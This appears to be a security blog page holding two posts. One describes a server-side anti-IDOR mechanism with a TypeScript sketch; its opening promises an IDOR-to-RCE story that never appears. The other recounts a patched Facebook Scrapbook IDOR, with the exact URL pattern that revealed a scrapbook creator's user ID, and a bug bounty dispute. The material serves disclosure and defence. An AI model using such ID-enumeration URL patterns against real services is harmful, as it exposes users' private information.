I’m not going to disclose the name of the company or the software this serious vulnerability was found in. I am not even going to say that this is a huge company with a QA and security response team that could fill an entire mall.
But I am going to tell you how an IDOR became an RCE on the server, without graphic violent content of course. For Christ’s sake, children might be reading these lines!

Ideally speaking,
An IDOR is prevented using an anti-IDOR mechanism (AIM). We at FogMarks developed one a few years ago, and, knock on wood, none of our customers has ever dealt with an IDOR problem. Don’t worry, we’re not going to offer to sell it to you. This mechanism was created only for two large customers who shared the same code base. Create your own mechanism with the info below, jeez!
But seriously, AIM’s main goal is to AIM the usage of a certain object only at the user who created it, or who has access to it.

This is done by holding a database table specifically for sensitive objects that could be targeted from web clients.
When an object is inserted into the table, the mechanism generates a special 32-character identifier for it. This identifier is only used by the server, and it is called the SUID (Server Used ID). In addition, the mechanism issues a 15-digit integer identifier for the client side, called, of course, the CUID (Client Used ID). The CUID integer is derived from part of the 32-character SUID and part of the object’s permanent details (like its name – if the name cannot be changed afterwards) using a special algorithm.

In the users’ permissions table there is also a list of nodes containing the SUIDs of the objects the user has access to.

When the user issues a request from the client side (from the JS – a simple HTTP request: POST/GET/OPTIONS/DELETE/PUT…), the CUID is matched against the SUID – the algorithm tries to reconstruct the SUID from the supplied CUID. If it succeeds, it then tries to match the generated SUID against the SUID list in the user’s permissions table. If it matches, the requesting user gets one-time, limited access to the object. This one-time access is enabled for x minutes and for one static IP, until the next CUID-to-SUID matching process.

This whole process, of course, is managed by only one mechanism – the AIM. The AIM handles requests in a queue, so when dealing with many hundreds of requests – the AIM might not be the perfect solution (due to possible object changes by 2 different users).
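A much-simplified sketch of the SUID/CUID idea (the key, lengths and derivation below are placeholders for whatever ‘special algorithm’ a real AIM would use; the point is only that the client-side ID is derived from, and checked against, a server-side one):

import { createHmac, randomBytes } from "crypto";

const AIM_KEY = "replace-with-a-server-side-secret"; // never exposed to the client

// Server Used ID: 32 hex characters, stored alongside the object.
function newSuid(): string {
  return randomBytes(16).toString("hex");
}

// Client Used ID: a 15-digit number derived from the SUID and an immutable
// detail of the object (here, its name).
function deriveCuid(suid: string, objectName: string): string {
  const mac = createHmac("sha256", AIM_KEY).update(`${suid}:${objectName}`).digest("hex");
  return String(BigInt("0x" + mac.slice(0, 16)) % 1_000_000_000_000_000n).padStart(15, "0");
}

// On each request: look only at the SUIDs this user may touch, and accept the
// CUID only if it maps back to one of them.
function resolveCuid(cuid: string, userObjects: Map<string, string>): string | null {
  for (const [suid, objectName] of userObjects) {
    if (deriveCuid(suid, objectName) === cuid) return suid; // authorized
  }
  return null; // unknown CUID, or an object this user has no access to
}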

In conclusion, in order to keep your platform cured of IDORs, requests to access sensitive objects should be managed by only one mechanism. You don’t have to copy the exact logic we used and compile two different identifiers for the same object, but if you’d like to prevent IDORs from the very first moment (simple ID spoofing), our proposed solution is the way to go.

FogMarks has found more examples of IDORs in some very popular companies (which were patched, of course).

The Beauty And The Thoughtful


Today’s case-study is based on some recent events and misunderstandings I had with Facebook, and its main goal is to set researchers’ expectations of bug bounty programs. Both sides will be presented, of course, and you will be able to share your opinion in the comments section.

So, back in July I found that it was possible to link Scrapbooks that users had opened for their pets or family members to the users themselves (the ones related to the pet or family member), even if the user’s privacy setting for the pet or family member was set to ‘Only me’.

This could be done by any user, even one who was not friends with the victim. All he had to do was access this Facebook mobile URL: http://m.facebook.com/<SCRAPEBOOK_ID>/

After accessing this URL, the attacker was redirected to another URL: https://m.facebook.com/<CREATOR_FACEBOOK_USER_ID>/scrapbooks/ft.<SCRAPEBOOK_ID>/?_rdr

and the name and type of the Scrapbook were displayed, even if its privacy setting was set to ‘Only me’ by the creating user (the victim).

12 days after the initial report, Facebook said that the issue was ‘not reproducible’, and after my reply I was asked to provide even more information, so I created a full PoC video. Watch it to get the full picture and only then continue reading.

So, as you can see, accessing the supplied URL indeed redirected the attacker to the Scrapbook that was made by the victim, and revealed the Scrapbook name – which is not private – and the Scrapbook maker’s ID (the FBID of the victim user).

5 days after I sent the PoC video, Facebook finally acknowledged it and passed it on for a fix.

2 months after the acknowledgement I received an email from Facebook asking me to confirm the patch. They simply prevented unauthorized users from accessing the vulnerable URL and being redirected to the Scrapbook.

2 days after I confirmed the patch, I got a long mail reply stating:

Thanks for confirming the fix. I’ve discussed this report with the team and unfortunately we’ve determined that this report does not qualify under our program.

Ultimately the risk here was that someone who could guess the FBID of a scrapbook could see the owner of that scrapbook. The “name” here isn’t a private piece of information: it will show up whenever the child or pet is tagged, for example, and so any changes related to that aren’t particularly relevant here. The risk of someone searching such a large space of potential IDs in the hope of finding a particular type of object (rare) in a particular configuration (even rarer) makes it highly implausible that any information would be inadvertently discovered here. Even if you were to look through the space your search would be untargeted and could not recover information about a particular person.

In general we attempt to determine whether or not a report qualifies under our program shortly after the initial report is submitted. In this case we failed to do so, and you have my apologies for that. Please let me know if you have any additional questions here.

Or in short: thanks for confirming the fix; now, after we fixed it, we’ve determined that the impact could only be achieved with some hard work – iterating over Scrapbook IDs – so the report does not qualify and you won’t be rewarded for it.

And now I am asking: how rude is it to hold a vulnerability for 3 months, fix it, and then, only then, after the fix is deployed to production and there is no way to demonstrate another aspect of the impact, tell the researcher: “Thanks, but no thanks”?

This case-study is here to show researchers the various opinions that can exist about every report. In your opinion the vulnerability is severe, a must-fix that should not even be questioned, but in the eyes of the company or the person who validates the vulnerability – it is a feature, not a bug.

I would like to hear your opinion regarding this in the comments section below, on Twitter or by email.